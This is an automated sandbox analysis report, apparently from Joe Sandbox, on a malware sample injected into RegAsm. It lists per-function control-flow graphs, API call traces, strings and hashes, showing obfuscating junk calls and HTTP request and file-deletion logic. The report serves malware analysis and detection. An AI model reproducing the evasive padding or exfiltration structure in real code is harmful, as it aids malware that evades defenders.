                                                                control_flow_graph 647 40fc1e-40fd09 CreateSemaphoreA ReleaseSemaphore RegOpenKeyExA CreateFileMappingW SetEnvironmentVariableA CloseHandle RegOpenKeyExA LocalAlloc RegOpenKeyExA LocalFree CreateEventA SetEvent ResetEvent CreateMutexA 648 40fd0b-40fd17 ReleaseMutex OutputDebugStringA 647->648 649 40fd1d-40fd41 CreateWaitableTimerA SetEnvironmentVariableA 647->649 648->649 650 40fd43-40fd4a CancelWaitableTimer 649->650 651 40fd4c GetLastError 649->651 652 40fd4e-40fd5e CreateToolhelp32Snapshot 650->652 651->652 653 40ffe0-40ffe7 652->653 654 40fd64-40fd75 CreateWaitableTimerA 652->654 655 40fd77-40fd83 CancelWaitableTimer OutputDebugStringA 654->655 656 40fd89-40fdec SetEnvironmentVariableA CreateSemaphoreA ReleaseSemaphore OutputDebugStringA FindFirstFileA FindClose CreateMutexA 654->656 655->656 657 40fdf7-40fe01 SetEnvironmentVariableA 656->657 658 40fdee-40fdf5 ReleaseMutex 656->658 659 40fe03-40fe46 CreateEventA SetEvent ResetEvent CreateSemaphoreA GetLastError ReleaseSemaphore 657->659 658->659 660 40fe65-40fe6a OutputDebugStringA 659->660 661 40fe48-40fe63 RegOpenKeyExA 659->661 662 40fe70-40fe7f 660->662 661->662 663 40ffc7-40ffd3 Process32FirstW 662->663 664 40fe84-40fe97 663->664 665 40ffd9-40ffda CloseHandle 663->665 667 40ffc2 664->667 668 40fe9d-40ff2c CreateEventA SetEvent ResetEvent CreateSemaphoreA ReleaseSemaphore LocalAlloc OutputDebugStringA LocalFree RegOpenKeyExA CreateWaitableTimerA GetLastError 664->668 665->653 667->663 669 40ff37-40ff6f CreateWaitableTimerA OutputDebugStringA CancelWaitableTimer GetLastError CreateMutexA 668->669 670 40ff2e-40ff35 CancelWaitableTimer GetLastError 668->670 671 40ff71-40ff78 ReleaseMutex 669->671 672 40ff7a-40ff86 GetLastError SetEnvironmentVariableA 669->672 670->669 673 40ff8c-40ffa0 671->673 672->673 673->667 675 40ffa2-40ffbc CloseHandle 673->675 675->667
                                                                APIs
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLdjh5epvm), ref: 0040FC3D
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FC46
                                                                • RegOpenKeyExA.KERNEL32(80000001,reg1lftjymb,00000000,00020019,?), ref: 0040FC66
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000E35,00000000), ref: 0040FC74
                                                                • SetEnvironmentVariableA.KERNEL32(qhgw1ab5,fob2sj9z), ref: 0040FC8C
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FC8F
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regwvuepiu9,00000000,00020019,?), ref: 0040FCAA
                                                                • LocalAlloc.KERNEL32(00000000,00000903), ref: 0040FCB3
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg4rnlrcg8,00000000,00020019,?), ref: 0040FCD0
                                                                • LocalFree.KERNEL32(00000000), ref: 0040FCD3
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_26mp3425), ref: 0040FCE4
                                                                • SetEvent.KERNEL32(00000000), ref: 0040FCED
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040FCF4
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX34yeuucm), ref: 0040FD01
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040FD0C
                                                                • OutputDebugStringA.KERNEL32(tbbtvgtkq), ref: 0040FD17
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ggohtyic), ref: 0040FD25
                                                                • SetEnvironmentVariableA.KERNEL32(j5a1a2f9,r6nn23zx), ref: 0040FD37
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040FD44
                                                                • GetLastError.KERNEL32 ref: 0040FD4C
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040FD57
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_6qtqds15), ref: 0040FD6D
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040FD78
                                                                • OutputDebugStringA.KERNEL32(tgnyhn0oi), ref: 0040FD83
                                                                • SetEnvironmentVariableA.KERNEL32(lyaei9tw,bxo6mn3y), ref: 0040FD99
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML7xheqgqb), ref: 0040FDA6
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FDB1
                                                                • OutputDebugStringA.KERNEL32(txmor20l9), ref: 0040FDBC
                                                                • FindFirstFileA.KERNEL32(s_c8bvephs,?), ref: 0040FDCE
                                                                • FindClose.KERNEL32(00000000), ref: 0040FDD5
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXtn7gp4y9), ref: 0040FDE4
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040FDEF
                                                                • SetEnvironmentVariableA.KERNEL32(tfcibijy,opmncyih), ref: 0040FE01
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_k6twxvbe), ref: 0040FE0E
                                                                • SetEvent.KERNEL32(00000000), ref: 0040FE17
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040FE1E
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_feehg3ui), ref: 0040FE2F
                                                                • GetLastError.KERNEL32 ref: 0040FE37
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FE3E
                                                                • RegOpenKeyExA.KERNEL32(80000001,regfzrc44xo,00000000,00020019,?), ref: 0040FE5D
                                                                • OutputDebugStringA.KERNEL32(t4tbns3gr), ref: 0040FE6A
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_u9fx75f5), ref: 0040FEA7
                                                                • SetEvent.KERNEL32(00000000), ref: 0040FEB0
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040FEB7
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLpyjh0tf2), ref: 0040FECA
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040FED4
                                                                • LocalAlloc.KERNEL32(00000000,000002E2), ref: 0040FEE0
                                                                • OutputDebugStringA.KERNEL32(td0wujnth), ref: 0040FEED
                                                                • LocalFree.KERNEL32(00000000), ref: 0040FEF4
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regkfn324ta,00000000,00020019,?), ref: 0040FF0F
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_3j4hshlg), ref: 0040FF20
                                                                • GetLastError.KERNEL32 ref: 0040FF28
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040FF2F
                                                                • GetLastError.KERNEL32 ref: 0040FF35
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ytpu5f65), ref: 0040FF42
                                                                • OutputDebugStringA.KERNEL32(t01toqzbx), ref: 0040FF4F
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040FF56
                                                                • GetLastError.KERNEL32 ref: 0040FF5C
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX45e7ahhl), ref: 0040FF67
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040FF72
                                                                • GetLastError.KERNEL32 ref: 0040FF7A
                                                                • SetEnvironmentVariableA.KERNEL32(4oplm0pt,96hl8dlz), ref: 0040FF86
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FFBC
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040FFCF
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FFDA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$Event$SemaphoreTimerWaitable$Release$DebugErrorLastMutexOutputString$EnvironmentOpenVariable$CancelCloseLocal$HandleReset$AllocFileFindFirstFree$MappingProcess32SnapshotToolhelp32
                                                                • String ID: 4K@$4oplm0pt$96hl8dlz$MTX34yeuucm$MTX45e7ahhl$MTXtn7gp4y9$SMPHR_feehg3ui$WTMR_3j4hshlg$WTMR_6qtqds15$WTMR_ggohtyic$WTMR_ytpu5f65$XML7xheqgqb$XMLdjh5epvm$XMLpyjh0tf2$bxo6mn3y$ev_26mp3425$ev_k6twxvbe$ev_u9fx75f5$fob2sj9z$j5a1a2f9$lyaei9tw$opmncyih$qhgw1ab5$r6nn23zx$reg1lftjymb$reg4rnlrcg8$regfzrc44xo$regkfn324ta$regwvuepiu9$s_c8bvephs$t01toqzbx$t4tbns3gr$tbbtvgtkq$td0wujnth$tfcibijy$tgnyhn0oi$txmor20l9
                                                                • API String ID: 3250056895-1190674230
                                                                • Opcode ID: 5e399cd1c6cee180986081d77b4f727af80630b1fe4e92a825b41088928d9f12
                                                                • Instruction ID: b5ef87629e666c089a08aaa31d10835735c35b7037017a4a07802c9f129a8800
                                                                • Opcode Fuzzy Hash: 5e399cd1c6cee180986081d77b4f727af80630b1fe4e92a825b41088928d9f12
                                                                • Instruction Fuzzy Hash: 27915175A50394BFD7206BB09C4DFEE3E68EB49B41F114032F705E65E0D7B849818AAD
                                                                Function 0040E48D Relevance: 177.1, APIs: 63, Strings: 38, Instructions: 302timeregistrysynchronizationCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 677 40e48d-40e4cb CreateSemaphoreA ReleaseSemaphore 678 40e4d4 677->678 679 40e4cd-40e4d2 677->679 680 40e4d9-40e5ef RegOpenKeyExA CreateSemaphoreA ReleaseSemaphore CreateEventA SetEvent ResetEvent LocalAlloc LocalFree GetLastError CreateWaitableTimerA GetLastError CancelWaitableTimer OutputDebugStringA CreateWaitableTimerA CreateSemaphoreA ReleaseSemaphore RegOpenKeyExA CreateEventA SetEvent ResetEvent CreateWaitableTimerA SetEnvironmentVariableA 678->680 679->680 682 40e5f1-40e5f8 CancelWaitableTimer GetLastError 680->682 683 40e5fe-40e619 FindFirstFileA FindClose 680->683 682->683 684 40e61a-40e629 SetEnvironmentVariableA 683->684 684->684 685 40e62b-40e6bf CreateFileMappingW CloseHandle GetLastError CreateWaitableTimerA CancelWaitableTimer OutputDebugStringA LocalAlloc SetEnvironmentVariableA LocalFree CreateSemaphoreA OutputDebugStringA ReleaseSemaphore 684->685 686 40e6c1-40e6c6 OutputDebugStringA 685->686 687 40e6cc-40e6ea OutputDebugStringA CreateMutexA 685->687 686->687 688 40e712-40e717 687->688 689 40e6ec-40e710 RegOpenKeyExA ReleaseMutex 687->689 690 40e71c-40e736 SetEnvironmentVariableA 688->690 689->690 692 40e82b-40e82d 690->692 693 40e73c-40e787 CreateEventA SetEvent ResetEvent FindFirstFileA FindClose CreateMutexA 690->693 694 40e836 692->694 695 40e82f-40e830 LocalFree 692->695 696 40e792-40e79e RegOpenKeyExA 693->696 697 40e789-40e790 ReleaseMutex 693->697 698 40e838-40e83c 694->698 695->694 699 40e7a4-40e7f6 CreateFileMappingW RegOpenKeyExA CloseHandle RegOpenKeyExA CreateWaitableTimerA 696->699 697->699 700 40e7f8-40e7f9 CancelWaitableTimer 699->700 701 40e7ff-40e808 call 40f012 699->701 700->701 703 40e80d-40e829 LocalFree 701->703 703->698
                                                                APIs
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ncjvn580), ref: 0040E4AD
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E4B3
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regurxbk0z1,00000000,00020019,0040A700), ref: 0040E4DA
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML5zofh5uh), ref: 0040E4EB
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E4F3
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_auaalwdo), ref: 0040E502
                                                                • SetEvent.KERNEL32(00000000), ref: 0040E50B
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040E512
                                                                • LocalAlloc.KERNEL32(00000000,00000D8E), ref: 0040E51F
                                                                • LocalFree.KERNEL32(00000000), ref: 0040E526
                                                                • GetLastError.KERNEL32 ref: 0040E52C
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_3wmy1555), ref: 0040E53B
                                                                • GetLastError.KERNEL32 ref: 0040E543
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040E54A
                                                                • OutputDebugStringA.KERNEL32(t4z65gxg3), ref: 0040E555
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_9k3bwwuv), ref: 0040E565
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLabwc5xbh), ref: 0040E585
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E58F
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg4fypal5k,00000000,00020019,?), ref: 0040E5A1
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_d1n9xjo7), ref: 0040E5B0
                                                                • SetEvent.KERNEL32(00000000), ref: 0040E5B9
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040E5C0
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_eoj7ddfd), ref: 0040E5CF
                                                                • SetEnvironmentVariableA.KERNEL32(3xq32c78,4hlbz7zc), ref: 0040E5E8
                                                                • CancelWaitableTimer.KERNEL32(0040A700), ref: 0040E5F2
                                                                • GetLastError.KERNEL32 ref: 0040E5F8
                                                                • FindFirstFileA.KERNEL32(s_1v7f4tmo,?), ref: 0040E60A
                                                                • FindClose.KERNEL32(00000000), ref: 0040E611
                                                                • SetEnvironmentVariableA.KERNEL32(2qerpjca,e2rrxjvp), ref: 0040E624
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000C88,00000000), ref: 0040E639
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E640
                                                                • GetLastError.KERNEL32 ref: 0040E646
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_gqvusl3l), ref: 0040E654
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040E65B
                                                                • OutputDebugStringA.KERNEL32(tbpwui15w), ref: 0040E66C
                                                                • LocalAlloc.KERNEL32(00000000,00000E0A), ref: 0040E674
                                                                • SetEnvironmentVariableA.KERNEL32(r0k2f9ww,x7e4a2x8), ref: 0040E686
                                                                • LocalFree.KERNEL32(00000000), ref: 0040E68D
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_93hrnvfl), ref: 0040E69E
                                                                • OutputDebugStringA.KERNEL32(tlel70lho), ref: 0040E6AB
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E6B2
                                                                • OutputDebugStringA.KERNEL32(tv7zqj1ex), ref: 0040E6C6
                                                                • OutputDebugStringA.KERNEL32(t4qmwjb86), ref: 0040E6D1
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXwtb7gfab), ref: 0040E6E0
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regptet050g,00000000,00020019,0040A700), ref: 0040E6F9
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040E700
                                                                • SetEnvironmentVariableA.KERNEL32(romsejjy,e5xfpe1y), ref: 0040E71C
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_h8vyhyer), ref: 0040E747
                                                                • SetEvent.KERNEL32(00000000), ref: 0040E750
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040E757
                                                                • FindFirstFileA.KERNEL32(s_f7rbex8u,?), ref: 0040E769
                                                                • FindClose.KERNEL32(00000000), ref: 0040E770
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX7li8kyt9), ref: 0040E77F
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040E78A
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg05x3yssi,00000000,00020019,0040A700), ref: 0040E79E
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000CA6,00000000), ref: 0040E7B0
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regkb6gxpys,00000000,00020019,?), ref: 0040E7C5
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E7CC
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regb5xnendj,00000000,00020019,?), ref: 0040E7DF
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_5b4k5ud8), ref: 0040E7EE
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040E7F9
                                                                • LocalFree.KERNEL32(00000000), ref: 0040E820
                                                                • LocalFree.KERNEL32(?), ref: 0040E830
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$EventTimerWaitable$Semaphore$LocalOpenRelease$DebugOutputString$CancelCloseEnvironmentErrorFileFindFreeLastMutexVariable$Reset$AllocFirstHandleMapping
                                                                • String ID: 2qerpjca$3xq32c78$4hlbz7zc$74pnz2dv$MTX7li8kyt9$MTXwtb7gfab$SMPHR_93hrnvfl$SMPHR_ncjvn580$WTMR_3wmy1555$WTMR_5b4k5ud8$WTMR_9k3bwwuv$WTMR_eoj7ddfd$WTMR_gqvusl3l$XML5zofh5uh$XMLabwc5xbh$e2rrxjvp$e5xfpe1y$ev_auaalwdo$ev_d1n9xjo7$ev_h8vyhyer$m7x7lnie$r0k2f9ww$reg05x3yssi$reg4fypal5k$regb5xnendj$regkb6gxpys$regponugcbe$regptet050g$regurxbk0z1$romsejjy$s_1v7f4tmo$s_f7rbex8u$t4qmwjb86$t4z65gxg3$tbpwui15w$tlel70lho$tv7zqj1ex$x7e4a2x8
                                                                • API String ID: 1123312507-2501424013
                                                                • Opcode ID: 1884832490b19ea5a778bc4c88caa1bc625836adc343164c9c22bbdf1f9d214c
                                                                • Instruction ID: d4bae38c1ac0806ebe60742d17ca1736c8f2320d5270f5dde25be8e2fd7a8f4b
                                                                • Opcode Fuzzy Hash: 1884832490b19ea5a778bc4c88caa1bc625836adc343164c9c22bbdf1f9d214c
                                                                • Instruction Fuzzy Hash: EDA11135E81354BBD7205FA19D4EFDB3E68EB0DB52F104422F705E65E0C6B89A808B6D
                                                                Function 0040ED79 Relevance: 131.5, APIs: 47, Strings: 28, Instructions: 215timeregistrymemoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
                                                                • OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
                                                                • RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
                                                                • OutputDebugStringA.KERNEL32(taidzcf8e), ref: 0040EDF6
                                                                • OutputDebugStringA.KERNEL32(te82qlpx1), ref: 0040EDFD
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
                                                                • RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
                                                                • LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
                                                                • RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
                                                                • LocalFree.KERNEL32(00000000), ref: 0040EE5A
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
                                                                • SetEvent.KERNEL32(00000000), ref: 0040EE8D
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040EE94
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
                                                                • GetLastError.KERNEL32 ref: 0040EEAB
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040EEB6
                                                                • OutputDebugStringA.KERNELBASE(t4mysaur5), ref: 0040EEC8
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040EEDD
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 0040EEF1
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000260,00000000), ref: 0040EF03
                                                                • GetLastError.KERNEL32 ref: 0040EF0B
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040EF12
                                                                • FindFirstFileA.KERNEL32(s_78akpirh,?), ref: 0040EF24
                                                                • FindClose.KERNEL32(00000000), ref: 0040EF2B
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_c33ulp1b), ref: 0040EF3A
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040EF45
                                                                • RegOpenKeyExA.KERNEL32(80000001,regnnoidgbh,00000000,00020019,?), ref: 0040EF60
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_5ur9xojv), ref: 0040EF6D
                                                                • SetEvent.KERNEL32(00000000), ref: 0040EF76
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040EF7D
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_28kapc83), ref: 0040EF8B
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040EF92
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLhgc16pbm), ref: 0040EFA1
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EFAB
                                                                • OutputDebugStringA.KERNEL32(tih43o6yt), ref: 0040EFB6
                                                                • OutputDebugStringA.KERNEL32(tdcs470r4), ref: 0040EFC0
                                                                • LocalAlloc.KERNEL32(00000000,000000F1), ref: 0040EFCD
                                                                • SetEnvironmentVariableA.KERNEL32(8hhspfe7,y8ldbn1v), ref: 0040EFE5
                                                                • LocalFree.KERNEL32(00000000), ref: 0040EFE8
                                                                • OutputDebugStringA.KERNEL32(t4xlw2t0n), ref: 0040EFF3
                                                                • SetEnvironmentVariableA.KERNEL32(68l1qnot,pk835cg2), ref: 0040EFFF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$TimerWaitable$DebugOutputString$EventSemaphore$Local$CancelOpenRelease$AllocFind$CloseEnvironmentErrorFileFreeLastMutexResetVariable$ByteChangeCharFirstMappingMultiNotificationWide
                                                                • String ID: 23b7de51bb42a569733f1e26dbce63ba$68l1qnot$8hhspfe7$MTX9of20kmn$SMPHR_7pn5tvkk$WTMR_28kapc83$WTMR_c33ulp1b$WTMR_mn0c9pqk$WTMR_t2lry32w$XMLhgc16pbm$XMLk6eld4rr$ev_5ur9xojv$ev_gc0upe3h$pk835cg2$regd0052drm$regnnoidgbh$regou0dc9en$regp7r1ymid$s_78akpirh$t3u620qk9$t4mysaur5$t4xlw2t0n$t6xplss11$taidzcf8e$tdcs470r4$te82qlpx1$tih43o6yt$y8ldbn1v
                                                                • API String ID: 3842003964-1461807850
                                                                • Opcode ID: 21a305686ee079c1fcd256b2c1bc3c758b65bb888e22eeb740056fdffb4e445b
                                                                • Instruction ID: 580180a41c01fb162bce7c08d2167115d5501e97d870e7efc00abc2bd202d83f
                                                                • Opcode Fuzzy Hash: 21a305686ee079c1fcd256b2c1bc3c758b65bb888e22eeb740056fdffb4e445b
                                                                • Instruction Fuzzy Hash: 1261A331E81254BBD7206BA19C4DFDF3F68EF8DB91F114062F705A65E0CAB849C086AD
                                                                Function 0040B3DA Relevance: 124.8, APIs: 55, Strings: 16, Instructions: 590networkmemorystringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 719 40b3da-40b422 LocalAlloc 722 40b428-40b42f 719->722 723 40b65e 719->723 722->723 724 40b435-40b439 722->724 725 40b660-40b664 723->725 724->723 726 40b43f-40b444 724->726 726->723 727 40b44a-40b476 726->727 729 40b478-40b47d 727->729 730 40b4ba-40b507 lstrlenW * 2 LocalFree LocalAlloc 727->730 731 40b480-40b486 729->731 735 40b50d-40b513 730->735 736 40b5ce-40b61c LocalAlloc * 2 730->736 733 40b488-40b48a 731->733 734 40b48c-40b48e 731->734 737 40b49c-40b4b5 733->737 738 40b490-40b494 734->738 739 40b496-40b499 734->739 741 40b515-40b5aa call 40ed79 call 40f012 * 12 735->741 744 40b622-40b63c 736->744 745 40b72e-40b742 LocalFree * 2 736->745 737->731 740 40b4b7 737->740 738->737 739->737 740->730 834 40b5af-40b5bf LocalFree 741->834 753 40b665-40b6a1 CreateFileMappingW GetLastError CloseHandle GetLastError CreateMutexA 744->753 754 40b63e-40b658 LocalFree * 4 744->754 747 40b884-40b8df call 40f23a * 4 lstrcpyn 745->747 748 40b748-40b74e 745->748 795 40b8e1-40b8eb 747->795 796 40b8ed-40b93b LocalFree InternetSetOptionW * 2 747->796 751 40b751-40b819 LocalAlloc call 40f23a * 11 748->751 850 40b845-40b849 751->850 851 40b81b-40b821 751->851 759 40b6a3-40b6c5 ReleaseMutex RegOpenKeyExA 753->759 760 40b6c7-40b6d1 SetEnvironmentVariableA 753->760 754->723 764 40b6d7-40b713 CreateSemaphoreA ReleaseSemaphore GetLastError CreateSemaphoreA 759->764 760->764 764->745 773 40b715-40b725 764->773 773->745 785 40b727-40b72b 773->785 785->745 795->796 803 40ba00-40ba24 CreateSemaphoreA ReleaseSemaphore 796->803 804 40b941-40b95e 796->804 807 40ba25-40ba2a GetLastError 803->807 816 40b964-40b99a HttpOpenRequestW 804->816 817 40b9f9-40b9fa InternetCloseHandle 804->817 807->807 810 40ba2c-40ba4c CreateSemaphoreA GetLastError ReleaseSemaphore 807->810 814 40ba5a-40ba5f 810->814 815 40ba4e-40ba58 810->815 820 40ba64-40baa2 SetEnvironmentVariableA MultiByteToWideChar 814->820 815->820 821 40b9f0-40b9f3 InternetCloseHandle 816->821 822 40b99c-40b9c0 HttpSendRequestW 816->822 817->803 839 40baa4-40bac8 MultiByteToWideChar 820->839 840 40bacd-40bacf 820->840 821->817 831 40b9c2-40b9c7 822->831 832 40b9e6-40b9ed InternetCloseHandle 822->832 836 40b9d4-40b9e4 831->836 832->821 834->741 835 40b5c5-40b5cb 834->835 835->736 836->832 847 40b9c9-40b9ce 836->847 839->840 843 40bad1-40bad2 LocalFree 840->843 844 40bad8-40baf4 LocalFree * 3 840->844 843->844 844->725 847->832 848 40b9d0 847->848 848->836 853 40b854-40b858 850->853 854 40b84b-40b84e LocalFree 850->854 851->850 852 40b823-40b838 ReadFile 851->852 855 40b83a 852->855 856 40b83d-40b83f CloseHandle 852->856 857 40b85a-40b866 DeleteFileW LocalFree 853->857 858 40b86c-40b87b LocalFree 853->858 854->853 855->856 856->850 857->858 858->751 859 40b881 858->859 859->747
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,0000C350,00000000,00000000,00000001,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000), ref: 0040B3F4
                                                                • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B4C3
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B4CA
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B4E9
                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B500
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B5B2
                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B5F7
                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B610
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B641
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B648
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B64F
